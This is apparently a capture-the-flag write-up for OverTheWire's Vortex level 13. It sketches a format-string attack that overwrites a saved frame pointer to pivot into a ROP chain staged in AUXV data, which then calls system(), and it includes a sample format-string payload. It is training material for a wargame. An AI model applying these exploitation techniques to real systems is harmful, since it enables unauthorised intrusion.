Continuing the series of vortex here. This is Vortex #13.
1: vortex 12
How big is your shellcode? This level has a non-executable stack. You must login to vortex.labs.overthewire.org to complete this level.
okay so we grab the binary and take a look we see two functions.
so this is a format string and the string allowed is 0x14 bytes long. Also we are only allowed to use specific characters. The allowed characters are
We need to control the execution. So after the loop we have free we can overwrite it's got and control the execution but as you know we're only allowed to use 0x14 and that's not enought for a nice two-write, writing the first two bytes of free then second two bytes something like %Xx%114$hn%Yx%115$hn but that's not enought. Also all environments, and arguments are zeroed. We still can use AUXV to put our shellcode/data there, but we need to control the execution now. Another way to do it is with a one write by writing some saved frame pointer to do a ROP, so from vuln() we overwrite the saved ebp so when it leaves and returns to main we make it point to AUXV controlled data and we can do rop from there.
- We build all data, rop, ..etc in auxv using symlinks
- We use the format string to overwrite a pointer in this AUXV data this points to the saved ebp that we will make point to our rop in AUXV that will be reached when vuln leaves;return and then main leave;return
- Our rop points to system() and have a stack points to a string in libc that contains ./0123456789......